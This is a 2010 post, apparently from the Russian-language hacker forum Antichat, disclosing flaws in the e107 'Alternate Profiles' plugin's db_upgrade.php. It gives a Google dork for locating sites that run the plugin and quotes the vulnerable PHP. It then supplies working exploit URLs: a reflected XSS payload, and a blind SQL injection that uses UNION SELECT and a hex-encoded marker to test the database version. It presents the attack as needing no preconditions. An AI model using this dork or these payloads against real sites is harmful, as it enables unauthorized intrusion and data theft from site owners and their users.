
05.05.2010, 18:49
Reservists Of Antichat - Level 6
Alternate Profiles
Downloaded it from here.
Google dork: inurl:e107_plugins/alternate_profiles
./e107_plugins/alternate_profiles/db_upgrade.php
PHP code:
...
if(isset($_GET['con'])) {
    // $start and $end go straight from the query string into the LIMIT clause, unquoted
    $start = $_GET['start'];
    $end = $_GET['end'];
    $query = mysql_query("SELECT * FROM ".MPREFIX."alternate_profiles LIMIT $start,$end");
    $rows = mysql_num_rows($query);
    if (isset($_GET['count'])) {
        // $count is echoed back into the page without any encoding
        $count = $_GET['count'];
        $first = $_GET['start'] - 2;
        echo "Users #".$first." to #".$count." have been updated.<br/>";
    } else {...
PHP code:
...$split = explode("[||]",$row['user_custompage']);
// only rows whose user_custompage starts with the sentinel "0019283[||]" are counted as upgraded
if ($split[0] == "0019283") {
    $array = Array();
    $array['Mood'] = $split[1];
    $array['Status'] = $split[2];
    $array['Orientation'] = $split[3];
    $array['Hometown'] = $split[4];
    $array['Ethnicity'] = $split[5];
    $array['Occupation'] = $split[6];
    $array['Music'] = $split[7];
    $array['Films/Television'] = $split[8];
    $array['Favourite_Books'] = $split[9];
    $array['aboutme'] = $split[10];
    $db = serialize($array);
    mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_custompage='".$db."', user_simple='1' WHERE user_id=".$row['user_id']." ");
    unset($array);
    // $count is incremented for every matching row, whether or not the UPDATE succeeded
    $count++;
    echo "Updated user #".$row['user_id']."<br/>";
} else {
    mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_simple='0' WHERE user_id=".$row['user_id']." ");
}...
Result:
passive (reflected) XSS
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1&count=<script>alert(123)</script>
blind SQL injection
To exploit it, the result of the first query has to contain 0019283[||]; obviously it is better to hex-encode it to get around the quotes :)
Say the version is 5:
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=5
A total of 1 profiles have been upgraded - true
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=4
A total of 0 profiles have been upgraded - false
Bonus: no preconditions required.